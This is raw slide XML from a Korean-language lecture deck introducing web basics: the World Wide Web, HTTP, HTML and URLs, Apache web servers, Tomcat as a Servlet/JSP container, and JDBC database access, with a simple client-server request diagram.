              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>네트워크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6F99A4A2-DF00-960E-5060-2BF58F07E9F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4892675" y="2730500"/>
            <a:ext cx="2406650" cy="1866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관리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연산</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>제어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80DBE9-A998-2A9D-0CA3-C0080EF02E0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5801528" y="266013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DBMS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57C6ED0-99C0-F644-9180-3899B2EF8261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695450" y="2667000"/>
            <a:ext cx="93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 SE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1AB06B5B-0C47-28A7-4348-36C80162A413}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2825750"/>
            <a:ext cx="3098800" cy="603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JDBC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>연동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CF8BD9F-D62F-5B36-681A-572BA64B89E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895350" y="2343150"/>
            <a:ext cx="508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2491F110-18C7-A567-5DB9-9B182C52667D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150100" y="2361168"/>
            <a:ext cx="0" cy="298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23DC62A7-3096-3BE0-0260-7BFB5B26A889}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946150" y="2482850"/>
            <a:ext cx="6203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D0961E6-85C1-2CF8-F824-15E4D81DE191}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3244850" y="2146300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웹에서는 동작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7AF662F-4DEA-F570-05A4-C5EE7ACDC960}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3238500" y="2438400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Application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개발자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3944326D-7A84-F923-AF0A-60C4E44C4B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1421597" y="1344095"/>
            <a:ext cx="1232703" cy="603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99143E7-3C56-86F2-FBF5-9EAEF7212024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733550" y="113665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3F02C9D9-65EB-BDEB-2EC7-635D97CF118C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2558247" y="1325045"/>
            <a:ext cx="1232703" cy="603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디자인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05FC519-2EB5-E862-75F6-4B67533734E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2870200" y="111760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03E1CFD2-511B-A064-DD28-EAA7DC11A38E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2012147" y="1756845"/>
            <a:ext cx="1232703" cy="603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9FBE8C5-8C18-B19B-3EB7-AF01DC19EDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2324100" y="154940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13EF1ADF-8B38-7C17-B2F3-0B48AA2C65ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="895350" y="1047750"/>
            <a:ext cx="2978772" cy="1866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0841EDE-6AC1-D322-F1C0-AD28E90C196D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="349250" y="1689100"/>
            <a:ext cx="1327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 EE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Servlet/JSP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39559A6A-F00B-2BAB-1ED8-6ED2DE58CBC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="190500" y="927100"/>
            <a:ext cx="8070850" cy="4171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F80D155-801F-58FC-E4AA-C459E4E07E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460750" y="4286250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Framework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8729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4566431-6C40-C39C-7F83-228F5EB3D6A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482600" y="311150"/>
            <a:ext cx="9601539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웹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>( Web )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-WWW(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>orld </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>ide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>eb )  : W3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>인터넷에서 문자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>그림</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>그래픽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>소리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>영상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>멀티미디어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>등을 포함하는 문서를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Hyper Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>개념을 </a:t>
            </a:r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ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>도입하여 편리하게 전송하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>검색하는 서비스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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>인터넷 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>( internetwork )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> -Hyper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 사용하여 인터넷에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>산재되어있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 정보를 검색할 수 있도록 해주는 프로그램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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>컴퓨터로 연결하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>TCP/IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>프로토콜을 이용해 정보를 주고받는 네트워크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>. ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>누리망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 - 1973</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>년에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 정리한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>빈트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서프</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>밥 간이 네트워크와 네트워크를 하나의 통신망으로</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/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연결하고자 하는 의도로 이름을 부여하였다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Tim,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Berners-Lee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1989</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 고안한 웹 아버지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>. URL, HTTP, HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>최초설계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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>용어 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>-Hyper Text : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>문서안에 다른 문서로 연결할 수 있는 연결점을 가진 문서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-Hyper link : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>문서간의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 이동이나 한문서 내에서 이동할 대 사용하는 링크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-Hyper Media : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>음성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>영상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동영상등</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 다양한 종류의 미디어를 연결 하는 것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-HTML( Hyper Text Mark Language ) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>웹에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>하이퍼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 미디어 문서를 작성하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>사용자에게 보여주기 위한 언어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-HTTP (Hyper Text Transmission Protocol ) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>웹에서 웹 서버와 웹 클라이언트 간에 통신하기위한 규약 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>-URL (Uniform Resource Locator) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>인터넷에 존재하는 여러 자원을 요청하는 주소체계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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>프로토콜</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>domain:PORT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>요청할자원의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t> 이름</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>     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3164ADE-21F5-5706-9925-749F1B608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369" y="3108414"/>
            <a:ext cx="732680" cy="5371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D0962DA-2C0A-F463-4050-4740F1A510FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5937250" y="323850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인터넷의 아버지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1DF927C-DA0A-27D5-AD84-31DCE4247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425" y="3539430"/>
            <a:ext cx="732680" cy="92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569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AE59FBC-778E-9D77-FAEB-6E542A1A936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330200" y="285750"/>
            <a:ext cx="8965916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*Web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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 저장하고 있다가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>웹 클라이언트에서 요청이 들어오면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>을 응답해주는 프로그램</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> - Apache HTTP Server =&gt; apache.org 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*Web Container</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> - Servlet/ JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를 저장하고 있다가</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>웹 클라이언트에서 요청이 들어오면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>Servlet/JSP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>를</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>  HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>로 변환한 후 응답해주는 프로그램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Apache Tomcat =&gt; apache.org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Web Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>의 기능을 가진다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7BAC80E-A8ED-F47F-CD48-B3D5D0A62C4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5235575" y="1619250"/>
            <a:ext cx="1720850" cy="1250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F9CA452-33F9-26D7-2863-1932D64781B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13158" y="1390650"/>
            <a:ext cx="806449" cy="6048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5F6D98-D6A4-4786-7705-C82E27DD18B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5670550" y="1231900"/>
            <a:ext cx="137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2E970A2-B7D0-ACA9-F594-77BDC0181E3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2177" y="1517650"/>
            <a:ext cx="2385355" cy="1352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CF56020-6313-AFC8-0600-AB2DBD51B14D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771133" y="1231900"/>
            <a:ext cx="133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Client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8E86D99-D157-87F2-D1D6-092ED96C4AC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00875" y="1859875"/>
            <a:ext cx="355600" cy="444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2A2ED4-1F7D-6515-11A7-79990D02E26F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5988300" y="2265600"/>
            <a:ext cx="5613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a.html</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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792EB9A-0960-6AFC-183A-B43F04ADF275}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="938470" y="1540668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http://localhost/a.html</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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xmlns="" id="{109483FB-4572-9358-808F-FCA9C3217B70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3390900" y="1657350"/>
            <a:ext cx="1524000" cy="114300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1524000"/>
              <a:gd name="connsiteY0" fmla="*/ 50800 h 114300"/>
              <a:gd name="connsiteX1" fmla="*/ 88900 w 1524000"/>
              <a:gd name="connsiteY1" fmla="*/ 31750 h 114300"/>
              <a:gd name="connsiteX2" fmla="*/ 184150 w 1524000"/>
              <a:gd name="connsiteY2" fmla="*/ 6350 h 114300"/>
              <a:gd name="connsiteX3" fmla="*/ 260350 w 1524000"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 114300"/>
              <a:gd name="connsiteX4" fmla="*/ 1098550 w 1524000"/>
              <a:gd name="connsiteY4" fmla="*/ 6350 h 114300"/>
              <a:gd name="connsiteX5" fmla="*/ 1206500 w 1524000"/>
              <a:gd name="connsiteY5" fmla="*/ 25400 h 114300"/>
              <a:gd name="connsiteX6" fmla="*/ 1282700 w 1524000"/>
              <a:gd name="connsiteY6" fmla="*/ 31750 h 114300"/>
              <a:gd name="connsiteX7" fmla="*/ 1447800 w 1524000"/>
              <a:gd name="connsiteY7" fmla="*/ 76200 h 114300"/>
              <a:gd name="connsiteX8" fmla="*/ 1498600 w 1524000"/>
              <a:gd name="connsiteY8" fmla="*/ 101600 h 114300"/>
              <a:gd name="connsiteX9" fmla="*/ 1524000 w 1524000"/>
              <a:gd name="connsiteY9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000" h="114300">
                <a:moveTo>
                  <a:pt x="0" y="50800"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="29633" y="44450"/>
                  <a:pt x="59440" y="38861"/>
                  <a:pt x="88900" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="120842" y="24040"/>
                  <a:pt x="151840" y="12333"/>
                  <a:pt x="184150" y="6350"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209212" y="1709"/>
                  <a:pt x="234950" y="2117"/>
                  <a:pt x="260350" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1098550" y="6350"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1175990" y="7448"/>
                  <a:pt x="1134426" y="14589"/>
                  <a:pt x="1206500" y="25400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1231706" y="29181"/>
                  <a:pt x="1257300" y="29633"/>
                  <a:pt x="1282700" y="31750"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1409372" y="69006"/>
                  <a:pt x="1354036" y="55363"/>
                  <a:pt x="1447800" y="76200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1464733" y="84667"/>
                  <a:pt x="1481365" y="93766"/>
                  <a:pt x="1498600" y="101600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1525354" y="113761"/>
                  <a:pt x="1510742" y="101042"/>
                  <a:pt x="1524000" y="1143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070EACC-AF2F-CEFE-E414-AF189A804C3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3803650" y="146685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요청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xmlns="" id="{869448C8-3863-67A1-5D3A-9327F06670D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933700" y="2019300"/>
            <a:ext cx="2965450" cy="279400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 2965450 w 2965450"/>
              <a:gd name="connsiteY0" fmla="*/ 279400 h 279400"/>
              <a:gd name="connsiteX1" fmla="*/ 2635250 w 2965450"/>
              <a:gd name="connsiteY1" fmla="*/ 158750 h 279400"/>
              <a:gd name="connsiteX2" fmla="*/ 2533650 w 2965450"/>
              <a:gd name="connsiteY2" fmla="*/ 139700 h 279400"/>
              <a:gd name="connsiteX3" fmla="*/ 2254250 w 2965450"/>
              <a:gd name="connsiteY3" fmla="*/ 133350 h 279400"/>
              <a:gd name="connsiteX4" fmla="*/ 2051050 w 2965450"/>
              <a:gd name="connsiteY4" fmla="*/ 107950 h 279400"/>
              <a:gd name="connsiteX5" fmla="*/ 1898650 w 2965450"/>
              <a:gd name="connsiteY5" fmla="*/ 95250 h 279400"/>
              <a:gd name="connsiteX6" fmla="*/ 1689100 w 2965450"/>
              <a:gd name="connsiteY6" fmla="*/ 57150 h 279400"/>
              <a:gd name="connsiteX7" fmla="*/ 1574800 w 2965450"/>
              <a:gd name="connsiteY7" fmla="*/ 25400 h 279400"/>
              <a:gd name="connsiteX8" fmla="*/ 1352550 w 2965450"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 279400"/>
              <a:gd name="connsiteX9" fmla="*/ 355600 w 2965450"/>
              <a:gd name="connsiteY9" fmla="*/ 31750 h 279400"/>
              <a:gd name="connsiteX10" fmla="*/ 247650 w 2965450"/>
              <a:gd name="connsiteY10" fmla="*/ 50800 h 279400"/>
              <a:gd name="connsiteX11" fmla="*/ 120650 w 2965450"/>
              <a:gd name="connsiteY11" fmla="*/ 82550 h 279400"/>
